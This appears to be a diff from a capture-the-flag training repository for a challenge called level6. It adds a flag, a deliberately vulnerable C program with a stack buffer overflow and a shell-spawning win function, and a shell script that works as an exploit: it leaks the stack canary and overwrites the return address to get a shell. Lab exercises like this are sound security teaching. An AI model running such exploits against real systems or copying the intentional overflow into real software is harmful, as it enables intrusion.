solved 6

4/level6/flag.txt

@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}

4/level6/level6.c

@@ -0,0 +1,27 @@
+// gcc -o level6 -no-pie -fstack-protector level6.c
+#include <stdio.h>
+#include <unistd.h>
+
+void win(void) {
+  char *argv[2];
+  argv[0] = "/bin/sh";
+  argv[1] = NULL;
+  execve(argv[0], argv, NULL);
+}
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[64];
+  while (1) {
+    puts("What do you want to talk about?");
+    read(0, buffer, 128);
+    if (buffer[0] == '\0' || buffer[0] == '\n') break;
+
+    printf("I can't talk about %s.\n", buffer);
+  }
+  puts("Bye.");
+  return 0;
+}

4/level6/test.sh

@@ -0,0 +1,34 @@
+#objdump
+#00000000004011d6 g     F .text	000000000000003a              win
+
+OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"  #kind of irrelevant
+GADGET1="\x84\x12\x40\00\00\00\00\00"      #ret (for stack alignment)
+GADGET2="\x83\x12\x40\00\00\00\00\00"      #pop rdi, ret
+CMDADDR="\x48\x40\x40\00\00\00\00\00"
+CMDCALL="\xd6\x11\x40\00\00\00\00\00"
+#STACKPT="\x18\xde\xff\xff\xff\x7f\00\00"
+STACKPT="\x02\00\00\00\00\00\00\00"
+
+read
+read
+printf "$OLDFLAG"
+read
+read
+
+printf "$PADDING""AAAAAAAA\n"
+read
+read
+read canary
+>&2 echo "read canary: "$(echo "$canary" | hd)
+read input
+>&2 echo $input
+
+>&2 echo "writing canary + exploit"
+printf "\00$PADDING""1234567\00${canary:0:7}$STACKPT$CMDCALL\n"
+read input
+>&2 echo "should be bye: "$input
+printf "cat flag.txt\n"
+read input
+>&2 echo "should be shell: "$input